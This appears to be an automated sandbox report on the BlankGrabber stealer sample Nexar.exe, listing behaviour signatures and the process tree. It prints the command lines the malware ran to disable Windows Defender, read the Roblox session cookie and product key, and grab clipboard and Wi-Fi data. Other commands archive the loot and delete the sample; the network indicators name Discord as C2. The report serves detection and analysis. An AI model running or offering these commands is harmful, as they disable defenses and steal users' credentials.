Malware Analysis Report

2024-12-01 03:11

Sample ID 241111-q7bglsyqa1
Target Nexar.exe
SHA256 e107b2a22642b7d3e4637d7530745f9e557cf979d3710136729eb5bad060928c
Tags
blankgrabber collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e107b2a22642b7d3e4637d7530745f9e557cf979d3710136729eb5bad060928c

Threat Level: Known bad

The file Nexar.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Clipboard Data

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Obfuscated Files or Information: Command Obfuscation

Looks up external IP address via web service

UPX packed file

Enumerates processes with tasklist

Hide Artifacts: Hidden Files and Directories

Drops file in Windows directory

Browser Information Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Netsh Helper DLL

Gathers system information

Detects videocard installed

Views/modifies file attributes

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 13:53

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 13:53

Reported

2024-11-11 14:03

Platform

win11-20241007-en

Max time kernel

600s

Max time network

593s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Nexar.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Nexar.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133758068608764568" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3144 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Users\Admin\AppData\Local\Temp\Nexar.exe
PID 4844 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3752 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4748 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3476 wrote to memory of 4780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 5012 wrote to memory of 4996 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4844 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 644 wrote to memory of 3672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4844 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 1876 wrote to memory of 1736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4844 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 796 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4844 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 2184 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4844 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2176 wrote to memory of 3400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4844 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 1984 wrote to memory of 128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1724 wrote to memory of 4696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4844 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\Nexar.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Nexar.exe

"C:\Users\Admin\AppData\Local\Temp\Nexar.exe"

C:\Users\Admin\AppData\Local\Temp\Nexar.exe

"C:\Users\Admin\AppData\Local\Temp\Nexar.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nexar.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please try again', 0, 'Error', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nexar.exe'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please try again', 0, 'Error', 0+16);close()"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Nexar.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​    .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​    .scr'

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Nexar.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 blob removed]"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 blob removed]

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cwqcbj0t\cwqcbj0t.cmdline"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82BD.tmp" "c:\Users\Admin\AppData\Local\Temp\cwqcbj0t\CSC249D26D4459C45A3B0F4373D7B9F8A7.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\A0WiC.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\A0WiC.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8d37fcc40,0x7ff8d37fcc4c,0x7ff8d37fcc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1836,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1840 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1884,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1896 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2224 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3432 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3124,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4408 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4544,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4644 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4640,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Nexar.exe""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4608,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4900 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4900,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4920 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4664,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4656 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4912 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4964 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

